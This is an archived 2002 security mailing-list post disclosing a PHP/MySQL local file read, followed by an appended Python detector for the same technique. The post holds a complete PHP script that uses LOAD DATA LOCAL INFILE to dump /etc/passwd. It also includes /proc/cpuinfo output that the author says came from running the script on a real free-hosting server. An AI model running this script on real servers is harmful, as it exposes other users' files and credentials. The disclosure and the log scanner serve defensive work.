File reading vulnerable in PHP and MySQL (Local Exploit)

From: Hai Nam Luke (hainamlukeat_private)
Date: Tue Nov 26 2002 - 02:57:52 PST


    
    An attacker can use PHP and MySQL to read local files this way:
    
    # Create a database (MySQL) and upload this file to your server
    PHP Code: viewfile.php (programmed by Luke)
    
    ======================================================
    <?php
    // config this data
    $dbhost = "";
    $dbuser = "";
    $dbpasswd = "";
    $dbname = "";
    $file = "/etc/passwd"; // filename that you wanna view
    
    // shell code
    echo "<pre>";
    
    // Legacy ext/mysql API (PHP 4/5); the MySQL client library on the web
    // server must have LOAD DATA LOCAL enabled for this to work.
    mysql_connect($dbhost, $dbuser, $dbpasswd);
    
    // One temporary table with a single LONGBLOB column receives the whole
    // file as one row: the terminators are strings that never occur in it.
    $tbl = 'A' . time();
    $sql = array(
        "USE $dbname",
    
        "CREATE TEMPORARY TABLE $tbl (a LONGBLOB)",
    
        "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
        . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
        . "ESCAPED BY '' "
        . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
    
        "SELECT a FROM $tbl LIMIT 1"
    );
    
    foreach ($sql as $statement) {
        $query = mysql_query($statement);
    
        if ($query === false) die(
            "FAILED: " . $statement . "\n" .
            "REASON: " . mysql_error() . "\n"
        );
    
        // Only the final SELECT returns a result set; the others return TRUE.
        if (! $r = @mysql_fetch_array($query, MYSQL_NUM)) continue;
    
        echo htmlspecialchars($r[0]);
        mysql_free_result($query);
    }
    echo "</pre>";
    ?>
    
    ======================================================
    
    You'll receive the whole contents of /etc/passwd.
    
    This vulnerability is very dangerous because a user can read important 
    files on your server. Especially at any free host, a user can use this local 
    exploit to read the source code of other users and attack one another.
    
    Example: I uploaded this file, configured it at http://members.lycos.co.uk/ 
    and received their file "/proc/cpuinfo":
    
    ==============================================================
    processor	: 0
    vendor_id	: GenuineIntel
    cpu family	: 6
    model		: 8
    model name	: Pentium III (Coppermine)
    stepping	: 10
    cpu MHz		: 997.531
    cache size	: 256 KB
    fdiv_bug	: no
    hlt_bug		: no
    f00f_bug	: no
    coma_bug	: no
    fpu		: yes
    fpu_exception	: yes
    cpuid level	: 2
    wp		: yes
    flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse
    bogomips	: 1992.29
    
    processor	: 1
    vendor_id	: GenuineIntel
    cpu family	: 6
    model		: 8
    model name	: Pentium III (Coppermine)
    stepping	: 10
    cpu MHz		: 997.531
    cache size	: 256 KB
    fdiv_bug	: no
    hlt_bug		: no
    f00f_bug	: no
    coma_bug	: no
    fpu		: yes
    fpu_exception	: yes
    cpuid level	: 2
    wp		: yes
    flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse
    bogomips	: 1992.29
    ==============================================================
    
    And many other files; please check your server!
    Thanks to dodo. Sorry for my poor English!
    
    Luke (HVA)
    http://www.hackervn.net
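A defender-side check for the technique in the post, added here as an example and not part of Luke's message or of MySQL: it scans MySQL general-query-log style records for LOAD DATA LOCAL INFILE statements that pull client-side files from outside an import directory, which is exactly the read viewfile.php performs. The record layout (time, thread id, `Query`, statement), the import directory /var/lib/mysql-import and the sample log lines are all assumptions constructed for the example.

```python
"""Flag LOAD DATA LOCAL INFILE reads of client-side files in MySQL general-log lines."""
import re
from pathlib import PurePosixPath
# Legitimate imports are expected only from here (assumption for this example).
ALLOWED_IMPORT_DIR = PurePosixPath("/var/lib/mysql-import")

# The statement the post relies on; case-insensitive, single- or double-quoted path.
LOCAL_INFILE_RE = re.compile(
    r"\bLOAD\s+DATA\s+(?:LOW_PRIORITY\s+|CONCURRENT\s+)?LOCAL\s+INFILE\s+"
    r"(['\"])(?P<path>[^'\"]*)\1",
    re.IGNORECASE,
)
# Assumed general-log record layout: "<time>\t<thread id> Query\t<statement>".
QUERY_LINE_RE = re.compile(r"^(?P<time>.+?)\t\s*(?P<thread>\d+) Query\t(?P<sql>.*)$")

def is_outside_import_dir(path: str) -> bool:
    """True when the file the client would read is not under the import directory."""
    p = PurePosixPath(path)
    if not p.is_absolute():
        return True  # relative paths resolve on the client host; treat as suspicious
    try:
        p.relative_to(ALLOWED_IMPORT_DIR)
    except ValueError:
        return True  # comparison is by path component, so /x/import-evil is outside
    return False

def scan_general_log(lines):
    """Return (thread id, path) for each LOCAL INFILE read outside the import dir."""
    findings = []
    for line in lines:
        rec = QUERY_LINE_RE.match(line)
        if not rec:
            continue  # connect/quit records and other non-query noise
        hit = LOCAL_INFILE_RE.search(rec.group("sql"))
        if hit and is_outside_import_dir(hit.group("path")):
            findings.append((int(rec.group("thread")), hit.group("path")))
    return findings

# Constructed sample records imitating the general query log (not real captures).
SAMPLE_LOG = [
    "021126 10:57:52\t   12 Connect\twebapp@localhost on freehost_db",
    "021126 10:57:52\t   12 Query\tCREATE TEMPORARY TABLE A1038316672 (a LONGBLOB)",
    "021126 10:57:52\t   12 Query\tLOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE "
    "A1038316672 FIELDS TERMINATED BY '__THIS_NEVER_HAPPENS__' ESCAPED BY '' "
    "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
    "021126 10:58:03\t   13 Query\tLOAD DATA LOCAL INFILE '/var/lib/mysql-import/users.csv' INTO TABLE users",
    "021126 10:58:09\t   14 Query\tload data local infile \"/home/bob/public_html/config.php\" into table t1",
]
```

Detection only catches attempts while the capability is still present; disabling the `local_infile` server variable (or using a client library built without LOCAL support) removes the file read itself.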
    



    This archive was generated by hypermail 2b30 : Sat Nov 30 2002 - 12:42:27 PST